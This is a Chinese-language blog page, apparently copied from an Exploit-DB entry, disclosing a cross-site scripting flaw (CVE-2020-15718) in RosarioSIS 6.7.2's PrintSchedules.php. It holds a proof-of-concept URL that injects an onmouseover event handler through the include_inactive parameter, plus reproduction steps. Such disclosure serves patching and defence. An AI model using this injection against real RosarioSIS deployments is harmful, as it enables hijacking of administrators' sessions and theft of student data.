RosarioSIS 6.7.2 跨站脚本(XSS)漏洞技术分析与利用

本文详细介绍了RosarioSIS 6.7.2版本中存在的跨站脚本(XSS)漏洞(CVE-2020-15718),包括漏洞描述、概念验证(PoC)及复现步骤。该漏洞存在于Scheduling模块的PrintSchedules.php文件中,允许攻击者注入恶意脚本。

RosarioSIS 6.7.2 - 跨站脚本(XSS)

EDB-ID: 52449 CVE: 2020-15718 EDB 已验证:作者: CodeSecLab 类型: webapps 平台: PHP 发布日期: 2025-12-03

漏洞信息

概念验证(PoC)

http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计